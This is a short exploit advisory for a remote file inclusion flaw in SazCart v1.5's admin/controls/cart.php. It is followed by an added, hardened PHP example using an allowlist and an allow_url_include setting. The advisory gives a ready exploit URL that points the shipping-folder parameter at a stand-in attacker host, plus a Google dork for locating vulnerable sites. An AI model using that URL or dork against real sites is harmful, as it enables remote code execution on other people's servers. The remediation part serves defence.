sazcart v1.5 (cart.php) Remote File include

***---Hitamputih crew---*****
* Bug Found By : IbnuSina
* vendor : http://sazcart.com/site
* Risk : High
* Greetz : Solpot,permenhack,barbarosa,cah|gemblunkz,fung_men,setiawan,irvian,meteoroid
* and all member hitamputih crew community www.kaipank.org/forum
  especially thx to email@example.com
*************

bug found on admin/controls/cart.php

    include($_saz['settings']['shippingfolder'] . "/shipping.php");
    $Shipping = new Shipping;
    include($_saz['settings']['taxfolder'] . "/tax.php");
    $Tax = new Tax;

exploit :
http://sitename.com/[sazcart PATH]/admin/controls/cart.php?_saz[settings][shippingfolder]=HTTP://EVILCODE?

google dork: "powered by sazcart"
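
A hardened form of the include shown above, as an added example that is not part of the advisory or of SazCart: the folder value is accepted only when it exactly matches a known directory name and resolves to a file under the application root. The function saz_module_path(), the allowlist entries and the temporary directory layout are hypothetical, and the sample inputs are constructed.

```php
<?php
// Added example, not SazCart code. saz_module_path(), the allowlist and
// the temporary directory layout are hypothetical.

// Return the real path of $file inside an allowlisted module folder under
// $root, or null when the folder value must not be trusted.
function saz_module_path(string $root, string $folder, string $file, array $allowed): ?string
{
    // Exact match against known folder names: a URL such as
    // "HTTP://EVILCODE?" or any path-like value never passes.
    if (!in_array($folder, $allowed, true)) {
        return null;
    }
    $base = realpath($root);
    $path = realpath($root . DIRECTORY_SEPARATOR . $folder . DIRECTORY_SEPARATOR . $file);
    // realpath() is false for a missing file; the prefix check confirms the
    // resolved file still sits under the application root.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed layout for the demonstration: <tmp>/saz_demo_*/shipping/shipping.php
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . uniqid('saz_demo_');
mkdir($root . '/shipping', 0700, true);
file_put_contents($root . '/shipping/shipping.php', "<?php class Shipping {}\n");

// Settings are assigned by the application itself, never taken from the request.
$_saz = ['settings' => ['shippingfolder' => 'shipping']];
$allowed = ['shipping', 'tax'];

// Constructed inputs: the configured name, the advisory's URL value, an unknown name.
foreach (['shipping', 'HTTP://EVILCODE?', 'coupons'] as $candidate) {
    $ok = saz_module_path($root, $candidate, 'shipping.php', $allowed) !== null;
    printf("%-18s => %s\n", $candidate, $ok ? 'accepted' : 'rejected');
}

$path = saz_module_path($root, $_saz['settings']['shippingfolder'], 'shipping.php', $allowed);
if ($path !== null) {
    include $path;            // only a vetted local file is ever included
    $Shipping = new Shipping;
}

// Remove the constructed files.
unlink($root . '/shipping/shipping.php');
rmdir($root . '/shipping');
rmdir($root);
```

Setting allow_url_include = Off in php.ini (available since PHP 5.2) stops include() from fetching URLs as a second layer, independent of the application check.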